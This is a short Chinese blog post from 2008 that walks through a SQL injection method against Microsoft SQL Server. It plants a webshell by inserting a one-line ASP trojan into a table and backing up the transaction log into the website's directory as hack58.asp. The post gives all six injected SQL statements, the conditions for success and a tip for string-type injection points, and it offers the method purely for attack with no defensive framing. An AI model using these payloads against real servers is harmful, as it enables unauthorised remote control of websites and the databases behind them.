·深度剖析Log备份- -{2008-5-14 16:56:00}

一、前言 这是一种导出日志文件到web目录来获得shell的备份方法。 1.重用性好 多次备份的成功率 2.备份的SHell小 相对差异备份而言 3.成功率高 目前用backup log来测试的成功率是100%，就这样分析似乎不应该有失败的情况。 二、条件 1、必需得知道Web目录 2.Web和数据库没有分离 PS:如果WEB和数据库分离，并不代表我们没有机会，我们照样可以备份，只是需要满足些条件。 三、具体步骤： 第一步： ;alter database 库名 set RECOVERY FULL-- 第二步： ;create table cmd (a image)-- 第三步： ;backup log 库名 to disk = 'c:\cmd' with init-- 这样有点类似于增量备份的第一步，不过有点不同的是，做了这一步以后，备份出来的可用的shell是固定的。 第四步： ;insert into cmd (a) values (0x一句话木马)-- 第五步： ;backup log 库名 to disk = 'Web路径\hack58.asp'-- 第六步： ;drop table cmd-- PS:如果是字符型，请一定在语句前加'

[阅读全文 | 回复(0) | 引用通告 | 编辑,分类:97sese,97ai]